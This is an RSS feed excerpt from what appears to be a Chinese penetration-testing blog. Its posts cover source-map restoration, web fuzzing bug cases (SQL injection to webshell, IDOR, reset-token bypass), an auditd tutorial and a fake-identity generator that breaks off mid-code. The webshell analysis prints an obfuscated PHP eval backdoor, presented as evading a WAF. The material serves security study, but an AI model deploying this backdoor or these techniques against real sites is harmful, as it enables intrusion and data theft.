&lt;h2 id=&quot;说明&quot;&gt;说明&lt;/h2&gt;

&lt;p&gt;现在越来越多网站使用前后端分离技术，利用Webpack技术将JS类拓展语言进行打包，当然很多都是配套使用，例如Vue（前端Javascript框架）+Webpack技术；&lt;/p&gt;

&lt;p&gt;这种技术也在普及，并且转向常态化，对渗透测试人员来说极其不友好：&lt;/p&gt;

&lt;p&gt;1.增加了前端代码阅读的时间（可读性很差）
2.由原因1间接造成了前端漏洞的审计困难性&lt;/p&gt;

&lt;p&gt;但是也具备一定的好处：&lt;/p&gt;

&lt;p&gt;1.采用这种模式，后端接口将完全暴露在JS文件中&lt;/p&gt;

&lt;p&gt;除此之外，如果生成了Source Map文件可以利用该文件还原网站原始前端代码（关于技术名词的具体含义请自行查询百科）&lt;/p&gt;

&lt;p&gt;主流浏览器都自带解析Source Map文件功能（开发者工具-Sources【火狐下是调试器】）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15776956466997.jpg&quot; alt=&quot;-w270&quot; /&gt;&lt;/p&gt;

&lt;p&gt;展开可以看见具体文件和代码：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15776957736400.jpg&quot; alt=&quot;-w267&quot; /&gt;&lt;/p&gt;

&lt;p&gt;但是文件过多的情况下，单个查看繁琐，不便于搜索（浏览器的开发者工具支持全局文件搜索，但搜索速度较慢），使用&lt;code&gt;restore-source-tree&lt;/code&gt;可以解决这一问题。&lt;/p&gt;

&lt;h2 id=&quot;restore-source-tree-安装&quot;&gt;restore-source-tree 安装&lt;/h2&gt;

&lt;p&gt;原作者的有BUG，使用国外友人修复后的版本：https://github.com/laysent/restore-source-tree，安装步骤如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;git clone https://github.com/laysent/restore-source-tree
cd restore-source-tree
sudo npm install -g
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;source-map文件还原&quot;&gt;Source Map文件还原&lt;/h2&gt;

&lt;p&gt;在这类JS文件下通常会有一个注释：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15776960439534.jpg&quot; alt=&quot;-w568&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15776960674880.jpg&quot; alt=&quot;-w717&quot; /&gt;&lt;/p&gt;

&lt;p&gt;map文件就是js文件所在目录下，拼接URL即可访问，将其下载下来：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;wget http://hostname/static/js/app.fedfe85b2fdd8cf29dc7.js.map&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;restore-source-tree&lt;/code&gt;进行还原：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;# -o 参数是指定输出目录，若不适用则为默认的output目录
restore-source-tree app.fedfe85b2fdd8cf29dc7.js.map
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15776962157760.jpg&quot; alt=&quot;-w611&quot; /&gt;&lt;/p&gt;

&lt;p&gt;成功获得原代码：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15776962339667.jpg&quot; alt=&quot;-w281&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;reference&quot;&gt;Reference&lt;/h1&gt;

&lt;p&gt;https://yukaii.tw/blog/2017/02/21/restore-source-code-from-sourcemap-file/&lt;/p&gt;
</description>
          <pubDate>2020-01-08T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-01-08/2</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-01-08/2</guid>
        </item>
      
    
      
        <item>
          <title>WebFuzzing方法和漏洞案例总结</title>
          <description>&lt;h1 id=&quot;webfuzzing方法和漏洞案例总结&quot;&gt;WebFuzzing方法和漏洞案例总结&lt;/h1&gt;

&lt;p&gt;作者：Vulkey_Chen&lt;/p&gt;

&lt;p&gt;博客：gh0st.cn&lt;/p&gt;

&lt;h2 id=&quot;背景&quot;&gt;背景&lt;/h2&gt;

&lt;p&gt;之前有幸做过一次线下的议题分享《我的Web应用安全模糊测试之路》，讲解了一些常用的WebFuzzing技巧和案例，该议题得到了很大的回响，很多师傅们也与我进行了交流，但考虑到之前分享过很多思路非常不全面，这里以本篇文章作为一次总结，以实战引出技巧思路（方法）。&lt;/p&gt;

&lt;p&gt;我的Web应用安全模糊测试之路议题解读：&lt;code&gt;https://gh0st.cn/archives/2018-07-25/1&lt;/code&gt; （推荐阅读）&lt;/p&gt;

&lt;h2 id=&quot;实战案例&quot;&gt;实战案例&lt;/h2&gt;

&lt;p&gt;以下分享的案例都是个人在参与项目或私密众测邀请时遇见的真实案例，案例大多基于个人收集和整理的&lt;code&gt;FuzzDict项目&lt;/code&gt;（字典库）。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/fuzzdict.png&quot; alt=&quot;fuzzdict&quot; /&gt;&lt;/p&gt;

&lt;p&gt;其中涉及的一些漏洞可能无法作为Fuzzing归类，这里也进行了强行的归类，只是想告诉大家漏洞挖掘中思路发散的重要性，个人也觉得比较经典。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;注：&lt;/strong&gt; 漏洞案例进行了脱敏以及细节上的修改。&lt;/p&gt;

&lt;h3 id=&quot;案例-add&quot;&gt;案例-Add&lt;/h3&gt;

&lt;h4 id=&quot;sqli注入漏洞&quot;&gt;[SQLi注入漏洞]&lt;/h4&gt;

&lt;p&gt;1.获得项目子域：&lt;code&gt;https://xxx.com&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;2.目录扫描发现&lt;code&gt;/user/&lt;/code&gt;目录，二层探测发现&lt;code&gt;/register&lt;/code&gt;接口，其意为：“注册”&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722710437139.jpg&quot; alt=&quot;-w538&quot; /&gt;&lt;/p&gt;

&lt;p&gt;3.根据返回状态信息去Fuzz用户名、密码参数-&amp;gt;结果：&lt;code&gt;uname\pwd&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;4.对&lt;code&gt;uname参数&lt;/code&gt;进行SQL注入测试，简单的逻辑判断存在&lt;/p&gt;

&lt;p&gt;5.注入点使用16进制的方式无法注入，SQLmap参数&lt;code&gt;--no-escape&lt;/code&gt;即可绕过&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722712162025.jpg&quot; alt=&quot;-w648&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;拒绝服务图片验证码&quot;&gt;[拒绝服务]图片验证码&lt;/h4&gt;

&lt;p&gt;图片验证码DoS（拒绝服务攻击）这个思路很早就出来了，当时的第一想法就是采集样本收集参数，使用搜索引擎寻找存在图片验证码的点：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722714688846.jpg&quot; alt=&quot;-w800&quot; /&gt;&lt;/p&gt;

&lt;p&gt;根据这些点写了个脚本进行半自动的参数收集：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722718429294.jpg&quot; alt=&quot;-w1134&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在漏洞挖掘的过程中，经常会抓取图片验证码的请求进行Fuzz：&lt;/p&gt;

&lt;p&gt;图片验证码地址：https://xxx/validateCode
&lt;img src=&quot;/images/2019-11-11/15722716485524.jpg&quot; alt=&quot;-w606&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Fuzz存在潜藏参数，可控验证码生成大小：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722718790178.jpg&quot; alt=&quot;-w706&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;jsonp无中生有&quot;&gt;[JSONP]无中生有&lt;/h4&gt;

&lt;p&gt;获得一个敏感信息返回的请求端点：&lt;code&gt;http://xxx/getInfo&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;使用&lt;code&gt;callback_dict.txt&lt;/code&gt;字典进行Fuzz：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722720029660.jpg&quot; alt=&quot;-w536&quot; /&gt;&lt;/p&gt;

&lt;p&gt;成功发现&lt;code&gt;callback&lt;/code&gt;这个潜藏参数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722721391525.jpg&quot; alt=&quot;-w907&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;逻辑漏洞响应变请求&quot;&gt;[逻辑漏洞]响应变请求&lt;/h4&gt;

&lt;p&gt;这里同样是获得一个敏感信息返回的请求端点：&lt;code&gt;http://xxx/getInfo&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;返回的信息如下所示：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{&quot;responseData&quot;:{&quot;userid&quot;:&quot;user_id&quot;,&quot;login&quot;:&quot;user_name&quot;,&quot;password&quot;:&quot;user_password&quot;,&quot;mobilenum&quot;:&quot;user_mobilephone_number&quot;,&quot;mobileisbound&quot;:&quot;01&quot;,&quot;email&quot;:&quot;user_email_address&quot;}}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;尝试了一些测试思路都无法发现安全漏洞，于是想到了&lt;code&gt;响应变请求&lt;/code&gt;思路。&lt;/p&gt;

&lt;p&gt;将响应报文的JSON字段内容转化为HTTP请求的字段内容（BurpSuite插件项目：&lt;code&gt;https://github.com/gh0stkey/JSONandHTTPP&lt;/code&gt;）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722723549196.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;将相关的信息字段内容替换为测试账号B的信息（例如：login=A -&amp;gt; login=B）&lt;/p&gt;

&lt;p&gt;发现无法得到预期的越权漏洞，并尝试分析该网站其他请求接口对应的参数，发现都为大写，将之前的参数转换为大写：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722724827925.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;继续Fuzz，结果却出人意料达到了预期：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722725077041.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;案例-update&quot;&gt;案例-Update&lt;/h3&gt;

&lt;h4 id=&quot;逻辑漏洞命名规律修改&quot;&gt;[逻辑漏洞]命名规律修改&lt;/h4&gt;

&lt;p&gt;一个登录系统，跟踪JS文件发现了一些登录后的系统接口，找到其中的注册接口成功注册账户进入个人中心，用户管理处抓到如下请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST URL: https://xxx/getRolesByUserId
POST Data: userId=1028
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;返回如下信息：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722726547968.jpg&quot; alt=&quot;-w1068&quot; /&gt;&lt;/p&gt;

&lt;p&gt;可以看见这里的信息并不敏感，但根据测试发现userId参数可以进行越权遍历&lt;/p&gt;

&lt;p&gt;根据url判断这个请求的意思是根据用户id查看用户的身份，url中的驼峰方法(&lt;strong&gt;getRolesByUserId&lt;/strong&gt;)惊醒了我，根据命名规则结构我将其修改成&lt;strong&gt;getUserByUserId&lt;/strong&gt;，也就是根据用户id获取用户，也就成为了如下请求包。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST URL: https://xxx/getUserByUserId
POST Data: userId=1028
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722727698302.jpg&quot; alt=&quot;-w708&quot; /&gt;&lt;/p&gt;

&lt;p&gt;成功返回了敏感信息，并通过修改userId可以越权获取其他用户的信息。&lt;/p&gt;

&lt;h4 id=&quot;逻辑漏洞敏感的嗅觉&quot;&gt;[逻辑漏洞]敏感的嗅觉&lt;/h4&gt;

&lt;p&gt;在测一个刚上线的APP时获得这样一条请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST /mvc/h5/jd/mJSFHttpGWP HTTP/1.1
……

param={&quot;userPin&quot;:&quot;$Uid$&quot;,&quot;addressType&quot;:0}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;而这个请求返回的信息较为敏感，返回了个人的一些物理地址信息：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722729757171.jpg&quot; alt=&quot;-w545&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在这里&lt;code&gt;param参数&lt;/code&gt;是json格式的，其中&lt;code&gt;&quot;userPin&quot;:&quot;$Uid$&quot;&lt;/code&gt;引起我注意，敏感的直觉告诉我这里可以进行修改，尝试将&lt;code&gt;$Uid$&lt;/code&gt;修改为其他用户的用户名、用户ID，成功越权：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722731124416.jpg&quot; alt=&quot;-w560&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;逻辑漏洞熟能生巧&quot;&gt;[逻辑漏洞]熟能生巧&lt;/h4&gt;

&lt;p&gt;收到一个项目邀请，全篇就一个后台管理系统。针对这个系统做了一些常规的测试之后除了发现一些 没用的弱口令外(无法登录系统的)没有了其他收获。&lt;/p&gt;

&lt;p&gt;分析这个后台管理系统的URL:&lt;code&gt;https://xxx/?m=index&lt;/code&gt;，该URL访问解析过来 的是主⻚信息。&lt;/p&gt;

&lt;p&gt;尝试对请求参数&lt;code&gt;m&lt;/code&gt;的值进行&lt;code&gt;Fuzz&lt;/code&gt;，7K+的字典进行Fuzz，一段时间之后收获降临：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722732301271.jpg&quot; alt=&quot;-w792&quot; /&gt;&lt;/p&gt;

&lt;p&gt;获得了一个有用的请求:&lt;code&gt;?m=view&lt;/code&gt;，该请求可以直接未授权获取信息：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722732785662.jpg&quot; alt=&quot;-w741&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;案例-delete&quot;&gt;案例-Delete&lt;/h3&gt;

&lt;h4 id=&quot;逻辑漏洞token限制绕过&quot;&gt;[逻辑漏洞]Token限制绕过&lt;/h4&gt;

&lt;p&gt;在测业务的密码重置功能，发送密码重置请求，邮箱收到一个重置密码的链接：&lt;code&gt;http://xxx/forget/pwd?userid=123&amp;amp;token=xxxx&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;这时候尝试删除token请求参数，再访问并成功重置了用户的密码：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722735366150.jpg&quot; alt=&quot;-w234&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;sqli辅助参数删除报错&quot;&gt;[SQLi辅助]参数删除报错&lt;/h4&gt;

&lt;p&gt;挖掘到一处注入，发现是root（DBA）权限：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722736532748.jpg&quot; alt=&quot;-w457&quot; /&gt;&lt;/p&gt;

&lt;p&gt;但这时候，找不到网站绝对路径，寻找网站用户交互的请求&lt;code&gt;http://xxx/xxxsearch?name=123&lt;/code&gt;，删除&lt;code&gt;name=123&lt;/code&gt;，网站报错获取绝对路径：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722737353104.jpg&quot; alt=&quot;-w460&quot; /&gt;&lt;/p&gt;

&lt;p&gt;成功通过SQLi漏洞进行GetWebshell。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-11-11/15722737780009.jpg&quot; alt=&quot;-w265&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;总结&quot;&gt;总结&lt;/h2&gt;

&lt;p&gt;核心其实还是在于漏洞挖掘时的心细，一件事情理解透彻之后万物皆可Fuzz。&lt;/p&gt;

&lt;p&gt;平时注意字典的更新、整理和对实际情况的分析，再进行关联整合。&lt;/p&gt;
</description>
          <pubDate>2019-11-11T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-11-11/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-11-11/1</guid>
        </item>
      
    
      
        <item>
          <title>对某攻击队的Webshell进行分析</title>
          <description>&lt;p&gt;对我⽅已拿下的攻击方⾁鸡进⾏⽇志、⽂件等分析，发现⼤部分肉鸡的网站根目录都存在 images.php，提取该文件的内容并分析：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-08-21/image020.png&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;提出较为重要的那一段base64decode后的PHP代码进行分析：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;@session_start();//开启session

if(isset($_POST[&apos;code&apos;]))substr(sha1(md5($_POST[&apos;a&apos;])),36)==&apos;222f&apos;&amp;amp;&amp;amp;$_SESSION[&apos;theCode&apos;]=$_POST[&apos;code&apos;];if(isset($_SESSION[&apos;theCode&apos;]))@eval(base64_decode($_SESSION[&apos;theCode&apos;]));
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;代码逻辑&lt;/strong&gt;：判断POST请求参数code是否有值，当满足条件时则执行&lt;code&gt;substr(sha1(md5($_POST[&apos;a&apos;])),36)==&apos;222f&apos;&amp;amp;&amp;amp;$_SESSION[&apos;theCode&apos;]=$_POST[&apos;code&apos;]&lt;/code&gt;，这段代码的意思为将POST请求参数a的值进行md5加密再进行sha1加密，最后从加密后的字符串的第36位开始取值（sha1加密后的值为40位，这里也就是取后4位），当后四位等于&lt;code&gt;222f&lt;/code&gt;的时候条件为真则执行&lt;code&gt;$_SESSION[&apos;theCode&apos;]=$_POST[&apos;code&apos;]&lt;/code&gt;（Why？&lt;strong&gt;&amp;amp;&amp;amp;是逻辑与操作，如果&amp;amp;&amp;amp;的前面为false了，后面的就不会执行了，所以在这里也就间接的形成了一种判断从而必须满足后四位等于222f的条件&lt;/strong&gt;），最后进入该代码执行：&lt;code&gt;if(isset($_SESSION[&apos;theCode&apos;]))@eval(base64_decode($_SESSION[&apos;theCode&apos;]));&lt;/code&gt;，代码如此简单就不再重复描述～&lt;/p&gt;

&lt;p&gt;为了满足条件（&lt;code&gt;substr(sha1(md5($_POST[&apos;a&apos;])),36)==&apos;222f&apos;&lt;/code&gt;），我们可以采用钓鱼的方式等攻击方人员主动上钩（修改&lt;code&gt;images.php&lt;/code&gt;即可）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-08-21/image021.png&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当攻击方人员主动连接该Webshell时会将POST请求参数a的值写入到&lt;code&gt;pass.txt&lt;/code&gt;中。&lt;/p&gt;

&lt;p&gt;但此方法较为被动，我们还可以在本地搭建一个环境搭配Burp去爆破获取后四位为&lt;code&gt;222f&lt;/code&gt;的明文：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-08-21/image022.png&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-08-21/image023.png&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;获得了：&lt;code&gt;abc123000&lt;/code&gt;、&lt;code&gt;lipeng520&lt;/code&gt;、&lt;code&gt;160376&lt;/code&gt;这三个密码，可利用密码对其他的肉鸡再次进行反打。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;代码样本&lt;/strong&gt;：（测试可过安全狗）&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php

$CF=&apos;c&apos;.&apos;r&apos;.&apos;e&apos;.&apos;a&apos;.&apos;t&apos;.&apos;e&apos;.&apos;_&apos;.&apos;f&apos;.&apos;u&apos;.&apos;n&apos;.&apos;c&apos;.&apos;t&apos;.&apos;i&apos;.&apos;o&apos;.&apos;n&apos;;

$EB=@$CF(&apos;$x&apos;,&apos;e&apos;.&apos;v&apos;.&apos;a&apos;.&apos;l&apos;.&apos;(b&apos;.&apos;a&apos;.&apos;s&apos;.&apos;e&apos;.&apos;6&apos;.&apos;4&apos;.&apos;_&apos;.&apos;d&apos;.&apos;e&apos;.&apos;c&apos;.&apos;o&apos;.&apos;d&apos;.&apos;e($x));&apos;);

$EB(&apos;QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicmJiRfU0VTU0lPTlsndGhlQ29kZSddPSRfUE9TVFsnY29kZSddO2lmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSlAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7&apos;);

?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</description>
          <pubDate>2019-08-21T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-08-21/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-08-21/1</guid>
        </item>
      
    
      
        <item>
          <title>TRICK: Linux Auditd审计工具</title>
          <description>&lt;h2 id=&quot;背景&quot;&gt;背景&lt;/h2&gt;

&lt;p&gt;难题：/home/chen/test/目录下的index.html为首页文件，一直被入侵者恶意篡改&lt;/p&gt;

&lt;p&gt;需求：想要定位攻击方式以及篡改方式&lt;/p&gt;

&lt;p&gt;命令：&lt;code&gt;auditctl&lt;/code&gt; （安装：&lt;code&gt;sudo apt install auditd&lt;/code&gt;）&lt;/p&gt;

&lt;p&gt;参数：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;-w 监控文件路径
-p 监控文件筛选 r(读) w(写) x(执行) a(属性改变)
-k 关键词（用于查询监控日志）
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;运行：&lt;code&gt;sudo auditctl -w /home/chen/test/index.html -p w -k index&lt;/code&gt;，等待二次篡改&lt;/p&gt;

&lt;h2 id=&quot;过程&quot;&gt;过程&lt;/h2&gt;

&lt;p&gt;发现被篡改执行：&lt;code&gt;sudo ausearch -i -k index&lt;/code&gt; 查看日志&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;type=SYSCALL msg=audit(08/20/2019 02:22:10.905:509) : arch=x86_64 syscall=rename success=yes exit=0 a0=0x7f5c94011370 a1=0x7f5c94005d90 a2=0x0 a3=0x20 items=5 ppid=1966 pid=17243 auid=chen uid=chen gid=chen euid=chen suid=chen fsuid=chen egid=chen sgid=chen fsgid=chen tty=(none) ses=3 comm=pool exe=/usr/bin/gedit key=index 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;了解该日志的格式：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;syscall : 相关的系统调用
auid : 审计用户ID
uid 和 gid : 访问文件的用户ID和用户组ID
comm : 用户访问文件的命令
exe : 上面命令的可执行文件路径
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这里的&lt;code&gt;syscall&lt;/code&gt;可以理解为是执行的动作，那么这段日志就非常容易理解了：用户chen使用&lt;strong&gt;gedit&lt;/strong&gt; rename了该文件（重命名）&lt;/p&gt;

&lt;p&gt;那么&lt;code&gt;syscall&lt;/code&gt;是什么代表着编辑文件内容呢？（篡改）&lt;/p&gt;

&lt;p&gt;测试&lt;code&gt;gedit&lt;/code&gt;打开文件、编辑文件内容、保存文件，有三条日志：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;type=SYSCALL msg=audit(08/20/2019 02:22:10.897:506) : arch=x86_64 syscall=openat success=no exit=EEXIST(File exists) a0=0xffffff9c a1=0x7f5ca0009800 a2=O_WRONLY|O_CREAT|O_EXCL a3=0x1b6 items=2 ppid=1966 pid=17243 auid=chen uid=chen gid=chen euid=chen suid=chen fsuid=chen egid=chen sgid=chen fsgid=chen tty=(none) ses=3 comm=pool exe=/usr/bin/gedit key=index 
type=SYSCALL msg=audit(08/20/2019 02:22:10.897:507) : arch=x86_64 syscall=openat success=yes exit=17 a0=0xffffff9c a1=0x7f5ca0009800 a2=O_WRONLY|O_CREAT|O_NOFOLLOW a3=0x1b6 items=2 ppid=1966 pid=17243 auid=chen uid=chen gid=chen euid=chen suid=chen fsuid=chen egid=chen sgid=chen fsgid=chen tty=(none) ses=3 comm=pool exe=/usr/bin/gedit key=index 
type=SYSCALL msg=audit(08/20/2019 02:22:10.905:509) : arch=x86_64 syscall=rename success=yes exit=0 a0=0x7f5c94011370 a1=0x7f5c94005d90 a2=0x0 a3=0x20 items=5 ppid=1966 pid=17243 auid=chen uid=chen gid=chen euid=chen suid=chen fsuid=chen egid=chen sgid=chen fsgid=chen tty=(none) ses=3 comm=pool exe=/usr/bin/gedit key=index 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;syscall分别为：&lt;code&gt;openat&lt;/code&gt;、&lt;code&gt;openat&lt;/code&gt;、&lt;code&gt;rename&lt;/code&gt;，但注意到第一个&lt;code&gt;openat&lt;/code&gt;的日志中的&lt;code&gt;success等于no&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;也就是说我们可以理解日志中出现&lt;code&gt;syscall=openat&lt;/code&gt;即有人在修改文件，那么查看日志的命令就可以变成：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo ausearch -i -k index | grep &apos;syscall=openat&apos;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;END&lt;/strong&gt;：定位到了用户、进程就可以继续跟踪了。&lt;/p&gt;
</description>
          <pubDate>2019-08-20T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-08-20/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-08-20/1</guid>
        </item>
      
    
      
        <item>
          <title>RGPerson - 随机身份生成脚本</title>
          <description>&lt;h1 id=&quot;rgperson&quot;&gt;RGPerson&lt;/h1&gt;

&lt;p&gt;项目地址：&lt;a href=&quot;https://github.com/gh0stkey/RGPerson&quot;&gt;https://github.com/gh0stkey/RGPerson&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;RGPerson - 随机身份生成&lt;/p&gt;

&lt;p&gt;环境：python3&lt;/p&gt;

&lt;p&gt;使用方法：python3 RGPerson.py&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-08-16/0.png&quot; alt=&quot;rgperson&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;为什么需要ta&quot;&gt;为什么需要Ta&lt;/h2&gt;

&lt;p&gt;相信很多师傅们在做测试的时候经常遇到一些注册的业务功能，要填写的东西很多，我一般都是临时去百度用的信息，这样很繁琐所以决定造轮子撸了个随机身份生成的。&lt;/p&gt;

&lt;h2 id=&quot;介绍&quot;&gt;介绍&lt;/h2&gt;

&lt;p&gt;该脚本生成信息：姓名\年龄\性别\身份证\手机号\组织机构代码\统一社会信用代码&lt;/p&gt;

&lt;h2 id=&quot;脚本编写原理&quot;&gt;脚本编写原理&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;脚本的函数：&lt;/strong&gt; genMobile()、genIdCard()、genName()、genOrgCode()、genCreditCode()&lt;/p&gt;

&lt;p&gt;genMobile() 为随机生成手机号的函数&lt;/p&gt;

&lt;p&gt;genName() 为随机生成姓名的函数&lt;/p&gt;

&lt;p&gt;genIdCard() 为随机生成身份证的函数&lt;/p&gt;

&lt;p&gt;genOrgCode() 为随机生成组织机构代码的函数&lt;/p&gt;

&lt;p&gt;genCreditCode() 为随机生成统一社会信用代码的函数&lt;/p&gt;

&lt;h3 id=&quot;genmobile&quot;&gt;genMobile()&lt;/h3&gt;

&lt;p&gt;随机生成手机号：需要知道国内手机号的构成&lt;/p&gt;

&lt;p&gt;1.长度为十一位&lt;/p&gt;

&lt;p&gt;2.前三位表示运营商&lt;/p&gt;

&lt;p&gt;现在我们只需要做到收集手机号号段的前三位以及对应的运营商：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;prelist = {&quot;133&quot;:&quot;电信&quot;,&quot;149&quot;:&quot;电信&quot;,&quot;153&quot;:&quot;电信&quot;,&quot;173&quot;:&quot;电信&quot;,&quot;177&quot;:&quot;电信&quot;,&quot;180&quot;:&quot;电信&quot;,&quot;181&quot;:&quot;电信&quot;,&quot;189&quot;:&quot;电信&quot;,&quot;199&quot;:&quot;电信&quot;,&quot;130&quot;:&quot;联通&quot;,&quot;131&quot;:&quot;联通&quot;,&quot;132&quot;:&quot;联通&quot;,&quot;145&quot;:&quot;联通&quot;,&quot;155&quot;:&quot;联通&quot;,&quot;156&quot;:&quot;联通&quot;,&quot;166&quot;:&quot;联通&quot;,&quot;171&quot;:&quot;联通&quot;,&quot;175&quot;:&quot;联通&quot;,&quot;176&quot;:&quot;联通&quot;,&quot;185&quot;:&quot;联通&quot;,&quot;186&quot;:&quot;联通&quot;,&quot;166&quot;:&quot;联通&quot;,&quot;134&quot;:&quot;移动&quot;,&quot;135&quot;:&quot;移动&quot;,&quot;136&quot;:&quot;移动&quot;,&quot;137&quot;:&quot;移动&quot;,&quot;138&quot;:&quot;移动&quot;,&quot;139&quot;:&quot;移动&quot;,&quot;147&quot;:&quot;移动&quot;,&quot;150&quot;:&quot;移动&quot;,&quot;151&quot;:&quot;移动&quot;,&quot;152&quot;:&quot;移动&quot;,&quot;157&quot;:&quot;移动&quot;,&quot;158&quot;:&quot;移动&quot;,&quot;159&quot;:&quot;移动&quot;,&quot;172&quot;:&quot;移动&quot;,&quot;178&quot;:&quot;移动&quot;,&